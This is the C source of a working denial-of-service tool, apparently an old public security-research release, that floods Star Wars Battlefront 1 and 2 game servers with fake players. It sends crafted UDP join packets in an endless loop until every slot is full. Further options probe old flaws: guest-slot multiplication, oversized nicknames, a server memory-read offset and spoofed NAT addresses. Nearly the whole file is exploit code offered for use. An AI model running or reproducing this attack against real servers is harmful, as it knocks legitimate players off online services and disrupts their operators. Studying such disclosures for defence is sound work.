/*
    Copyright 2004,2005,2006,2007,2008,2009 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    aint with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl-2.0.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "show_dump.h"
#include "swbcrc.h"
#include "rwbits.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef unsigned char   u8;
typedef unsigned short  u16;
typedef unsigned int    u32;



#define VER         "0.4"
#define BUFFSZ      8192
#define PORT        3658
#define CHR         'a'

                    /* SWB decodes 32 bits of data each time */
#define SWBFPAD     pcklen = 5 + (b >> 3); \
                    if(b & 7) pcklen++; \
                    i = (pcklen - 5) & 3; \
                    if(i) pcklen += (4 - i);
#define SWBFPADX    i = b >> 3; \
                    if(b & 7) i++; \
                    if(i & 3) i += (4 - (i & 3)); \
                    b = (i + 4) << 3;
                    /* 4 = there is a 32 bit number between the 2 bits containers */



int write_bitstring(u8 *b, int bits, u8 *str);
void show_info_1_1(u8 *data);
int get_num(u8 *str);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer,
                        peerl;
    u32     b,
            mem_offset  = 0;
    int     sd,
            i,
            len,
            pcklen,
            timewait    = 1,
            hexdump     = 0,
            guests      = 0,
            src_nat     = 0,
            dst_nat     = 0,
            //info_only   = 0,
            only_one    = 0,
            guest_bits  = 3,
            server_ver  = 0;    // 0 = 1.0 and 1.01, 1 = 1.1, and so on
    u16     port = PORT;
    u8      *buff,
            *p5,
            *pck,
            *nick       = "",
            *pwd        = "";

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Star Wars Battlefront 1 and 2 Fake Players DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <host>\n"
            "\n"
            "Options:\n"
            "-o        enable the SWBF1 1.3 compatibility mode: 1 bit for the guest field\n"
            "          and version 104 (by default the tool works with SWBF2)\n" 
            "-p PORT   server port (%d)\n"
            "-n NICK   the nick you want to use for your fake player (default is none)\n"
            "-w PASS   the password to use if the server is protected\n"
            //"-i        shows server informations and exits. Works perfectly with servers\n"
            //"          >= 1.1 but second half of the info are wrong for servers <= 1.01\n"
            //"-t SEC    seconds to wait when the server is full, default is 1\n"
            "-v NUM    version number to use for joining a server, by default the number\n"
            "          is automatically scanned finding the exact server version\n"
            "-1        one player only\n"
            "\n"
            "Test options and tests for old vulnerabilities:\n"
            "-x        show the hex dump of the join-reply packets received\n"
            "-g        enable the guest player, practically one single packet is able to\n"
            "          fill 2 or more player positions and one of them is called Guest\n"
            "-s SIZE   use a nickname constituited by SIZE chars '%c' (max 255)\n"
            "-m OFFSET enable a server's option that lets clients to send a memory location\n"
            "          that will be read by the server (SWBF2 and PS2 don't support it)\n"
            "-f NUM    another test option that enable the usage of internal IPs (NAT).\n"
            "          since it is only for testing, all the IP and port used by this tool\n"
            "          are those of the same server. use -f 1 to enable client's NAT, 2 for\n"
            "          the server or 3 to enable both\n"
            "\n", argv[0], port, CHR);
        exit(1);
    }

    argc--;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 'o': { guest_bits = 1; server_ver = 104; } break;
            case 'p': port          = atoi(argv[++i]);      break;
            case 'n': nick          = argv[++i];            break;
            case 'w': pwd           = argv[++i];            break;
            //case 'i': info_only     = 1;                    break;
            //case 't': timewait      = atoi(argv[++i]);      break;
            case 'v': server_ver    = atoi(argv[++i]);      break;
            case '1': only_one      = 1;                    break;
            case 'x': hexdump       = 1;                    break;
            case 'g': guests        = 0xffffffff;           break;
            case 's': {
                len = atoi(argv[++i]);
                nick = malloc(len + 1);
                if(!nick) std_err();
                memset(nick, CHR, len);
                nick[len] = 0;
                } break;
            case 'm': mem_offset    = get_num(argv[++i]);   break;
            case 'f': {
                switch(atoi(argv[++i])) {
                    case 1: src_nat = 1; break;
                    case 2: dst_nat = 1; break;
                    case 3: src_nat = dst_nat = 1; break;
                    default: {
                        printf("\nError: NAT options are 1, 2 or 3\n\n");
                        exit(1);
                        } break;
                }
                } break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
                } break;
        }
    }

    peer.sin_addr.s_addr  = resolv(argv[argc]);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    peerl.sin_addr.s_addr = INADDR_ANY;
    peerl.sin_port        = htons(time(NULL));
    peerl.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    pck = malloc(BUFFSZ);
    if(!pck) std_err();
    p5 = pck + 5;
    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    memset(pck, 0, BUFFSZ);
    pck[0] = 2;    // info packet
    pck[1] = 0;
    *(u16 *)(pck + 2) = 0xffff;
    *(u16 *)(pck + 4) = 0;

    b = 0;
    b = write_bits(0, 1, p5, b);
    b = write_bits(time(NULL), 32, p5, b); // track ID 1 | used to track our
    b = write_bits(0, 4, p5, b);           // track ID 2 | query in the reply
    SWBFPAD

    printf("- request informations:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(!sd) std_err();
    len = send_recv(sd, pck, pcklen, buff, BUFFSZ, &peer, 1);
    if(len > 0) show_info_1_1(buff);
    close(sd);

    //if(info_only) return(0);

    memset(pck, 0, BUFFSZ);
    pck[0] = 4;    // join packet
    pck[1] = 0;
    *(u16 *)(pck + 2) = 0xffff;
    *(u16 *)(pck + 4) = 0;

    b = 0;
    b = write_bits(server_ver, 12, p5, b);
    b = write_bits(swbcrc(pwd, strlen(pwd)), 32, p5, b);
    guests &= ((1 << guest_bits) - 1);
    b = write_bits(guests, guest_bits, p5, b);    // number of guests to add
    b = write_bits(1, 2, p5, b);
    b = write_bitstring(p5, b, nick);

    SWBFPADX

    printf("- add %d guests\n", guests);
    for(i = 0; i < guests; i++) {
        b = write_bitstring(p5, b, nick);   // names of the guests (in reality only the first guest uses it)
    }
    b = write_bits(0, 32, p5, b);
    for(i = 0; i < guests; i++) {
        b = write_bits(0, 32, p5, b);
    }
    b = write_bits(mem_offset ? 1 : 0, 1, p5, b);
    if(mem_offset) b = write_bits(mem_offset, 32, p5, b);   // this is the "player is crashed" field
    b = write_bits(1, 1, p5, b);
    b = write_bits(1, 1, p5, b);
    b = write_bits(ntohl(peer.sin_addr.s_addr), 32, p5, b); // client IP
    b = write_bits(port, 16, p5, b);                        // client port
    b = write_bits(src_nat ? 1 : 0, 1, p5, b);
    if(src_nat) {                                           // LAN IP and port of the client
        b = write_bits(1, 1, p5, b);
        b = write_bits(ntohl(peer.sin_addr.s_addr), 32, p5, b);
        b = write_bits(port, 16, p5, b);
    }
    b = write_bits(ntohl(peer.sin_addr.s_addr), 32, p5, b); // server IP
    b = write_bits(port, 16, p5, b);                        // server port
    b = write_bits(dst_nat ? 1 : 0, 1, p5, b);
    if(dst_nat) {                                           // LAN IP and port of the server
        b = write_bits(1, 1, p5, b);
        b = write_bits(ntohl(peer.sin_addr.s_addr), 32, p5, b);
        b = write_bits(port, 16, p5, b);
    }
    b = write_bits(0, 1, p5, b);
    b = write_bits(0, 32, p5, b);  // if 0x31303030 ("1000") does something with the string swbf2.zip
    SWBFPAD

    printf("- start fake players attack:\n\n");
    for(;;) {
        printf("  player: ");

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        do {
            peerl.sin_port++;
        } while(bind(sd, (struct sockaddr *)&peerl, sizeof(struct sockaddr_in)) < 0);

        len = send_recv(sd, pck, pcklen, buff, BUFFSZ, &peer, 1);
        close(sd);

        if(hexdump) {
            fputc('\n', stdout);
            show_dump(buff, len, stdout);
        }

        if(buff[0] == 5) {
            if(buff[5] == 1) {
                printf(" server full\n");
                sleep(timewait * ONESEC);
                continue;
            } else if(buff[5] == 2) {
                printf("\n"
                    "Error: seems the server is password protected, use the -w option to specify\n"
                    "       the correct keyword\n"
                    "\n");
                exit(1);
            } if(buff[5] == 4) {
                server_ver = read_bits(12, p5, 0);
                printf(" wrong version (%d), I try to scan the next version\n", server_ver++);
                write_bits(server_ver, 12, p5, 0);
                continue;
            } else {
                printf("\nError: unknown error (%02x), check the following dump:\n", buff[5]);
                exit(1);
            }
        }

        printf(" ok\n");
        if(only_one) break;
    }

    printf("\n- done\n");
    return(0);
}



int write_bitstring(u8 *data, int b, u8 *str) {
    int     i,
            len;

    len = strlen(str);
    b = write_bits(len, 8, data, b);
    for(i = 0; i < len; i++) {
        b = write_bits(str[i], 8, data, b);
    }
    return(b);
}



void show_info_1_1(u8 *data) { // blah
    u32     len,
            b = 0;

    data += 5;
    read_bits(32, data, b); b += 32;      // track ID 1, the same of our query
    read_bits(4, data, b);  b += 4;       // track ID 1, the same of our query
    printf("\n  Server name:        ");
    len = read_bits(8, data, b);                                                b += 8;
    while(len--) {
        fputc(read_bits(8, data, b), stdout);                                   b += 8;
    }
    printf("\n  Gametype:           ");
    len = read_bits(8, data, b);                                                b += 8;
    while(len--) {
        fputc(read_bits(8, data, b), stdout);                                   b += 8;
    }
    printf("\n  Mission:            ");
    len = read_bits(8, data, b);                                                b += 8;
    while(len--) {
        fputc(read_bits(8, data, b), stdout);                                   b += 8;
    }
    printf("\n\n");
    return;

    printf("  Dedicated           %s\n", read_bits(1, data, b) ? "on" : "off"); b += 1;
    printf("  Team Auto Assign    %s\n", read_bits(1, data, b) ? "on" : "off"); b += 1;
    printf("  Heroes              %s\n", read_bits(1, data, b) ? "on" : "off"); b += 1;
    printf("  Team Damage         %s\n", read_bits(1, data, b) ? "on" : "off"); b += 1;
    printf("  Password            %s\n", read_bits(1, data, b) ? "on" : "off"); b += 1;
    printf("  AI Units            %u\n", read_bits(8, data, b));                b += 8;
    printf("  Score               %u to ", read_bits(11, data, b));             b += 11;
    printf("%u\n", read_bits(11, data, b));                                     b += 11;
    printf("  Players             %u\n", read_bits(7, data, b));                b += 7;
    len = read_bits(7, data, b);                                                b += 7;
    if(!len) {
        printf("\n"
            " The version of this server is not compatible with the query protocol used by\n"
            " this tool. All the informations until Password should be correct\n"
            "\n");
        return;
    }
    printf("  Max Players         %u\n", len);
    printf("  ???                 %u\n", read_bits(3, data, b));                b += 3;
    printf("  ???                 %u\n", read_bits(8, data, b));                b += 8;
    printf("  Min Players         %u\n", read_bits(7, data, b));                b += 7;
    printf("  AI Difficulty       %u\n", read_bits(2, data, b));                b += 2;
    printf("  Show Player Names   %s\n", read_bits(1, data, b) ? "on" : "off"); b += 1;
    printf("  Spawn Invincibility %u\n", read_bits(6, data, b));                b += 6;
    fputc('\n', stdout);
}



int get_num(u8 *str) {
    int     offset;

    if(!strncmp(str, "0x", 2) || !strncmp(str, "0X", 2)) {
        sscanf(str + 2, "%x", &offset);
    } else {
        sscanf(str, "%u", &offset);
    }
    return(offset);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) goto quit;
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct hostent *hp;
    u32 host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

